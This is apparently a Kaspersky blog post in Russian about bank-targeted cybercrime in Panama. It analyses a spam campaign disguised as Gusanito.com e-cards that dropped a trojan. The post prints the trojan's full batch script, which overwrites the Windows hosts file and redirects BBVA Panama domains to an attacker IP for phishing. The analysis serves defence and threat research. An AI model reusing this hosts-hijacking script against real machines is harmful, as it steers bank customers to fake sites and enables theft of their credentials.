Инциденты

Лакомый кусочек — Панама

Буквально несколько дней назад мы вернулись с конференции в Панаме, в ходе которой обсуждалась проблема кибер-преступности в Центральной Америке.

Хотя по внедренности интернета в повседневную жизнь лидирует Коста-Рика, наибольшее количество успешно реализованных атак приходится на Панаму.

Главным образом эти атаки были направлены против банков страны. Панама в данном случае является «лакомым кусочком» для преступников, благодаря тому, что в ней находится огромное количество банков, для которых созданы благоприятные условия, а также специальная коммерческая зона, деятельность которой не облагается налогами.

В нашей презентации мы рассказывали о том, что атаки сегодня зачастую имеют локальный характер. Иными словами, они создаются в определенной стране, для определенного контингента и, как правило, не выходят за пределы региона или даже отдельного госсударства. Таким образом, злоумышленники стараются минимизировать возможность быстрого детектирования угроз антивирусными компаниями.

Одна из таких атак была совершена 16 апреля, вскоре после нашего возвращения. Пользователям электронной почты в домене «pa» были разосланы спам-письма с предложением посмотреть почтовую открытку широко известного в Латинской Америке сервиса Gusanito.com. При клике на ссылку автоматически загружался файл 001002003.exe, который в свою очередь выполнял следующие операции:

@echo off
title AVERSINODETECTA———-HAHAHAHAHAHAHAHAHAHAHA
del c:WINDOWSsystem32driversetchosts
copy hosts c:WINDOWSsystem32driversetchosts
echo 75.127.*.* www.bbvapanama.com >>%windir%System32driversetchosts
echo 75.127.*.* bbvapanama.com >>%windir%System32driversetchosts
echo 75.127.*.* www.bbvanetpanama.com >>%windir%System32driversetchosts
echo 75.127.*.* bbvanetpanama.com >>%windir%System32driversetchosts
exit
echo > «C:DOCUME~1ADMINI~1LOCALS~1Temptmpfile0.tmp»

Как видно, зловред добавлял в файл локальных DNS специальную запись IP для доменных имен банка BBV Panama. Можно также предположить, что автор этого вируса сам родом из латинской америки. В поле «title» записана фраза на испанском, которую можно было бы перевести как: «а вдруг не заметят».

Если же жертва данного зловреда — клиент указанного банка — в какой-то момент пробовала зайти на его страницу, автоматически открывался фишинговый сайт, в точности повторяющий оригинальный:

На данный момент Антивирус Касперского детектирует данный зловред как Trojan.Win32.Qhost.alc

Интересно, что спустя 3 дня с момента начала атаки и до сих пор данная угроза детектируется только 2-мя антивирусами, один их которых — Антивирус Касперского. Это подтверждает тот факт, что злоумышленники стараются ограничить распространение своих зловредов в пределах какой-то определенной территории и тем самым гарантировать невозможность их детектирования в течение длительного времени антивирусными компаниями.

Лакомый кусочек — Панама

Ваш e-mail не будет опубликован. Обязательные поля помечены *

 

Отчеты

CloudSorcerer: новая APT-угроза, нацеленная на российские государственные организации

«Лаборатория Касперского» обнаружила новую APT-угрозу CloudSorcerer, нацеленную на российские государственные организации и использующую облачные службы в качестве командных серверов аналогично APT CloudWizard.

StripedFly: двуликий и незаметный

Разбираем фреймворк StripedFly для целевых атак, использовавший собственную версию эксплойта EternalBlue и успешно прикрывавшийся майнером.

Подпишитесь на еженедельную рассылку

Самая актуальная аналитика – в вашем почтовом ящике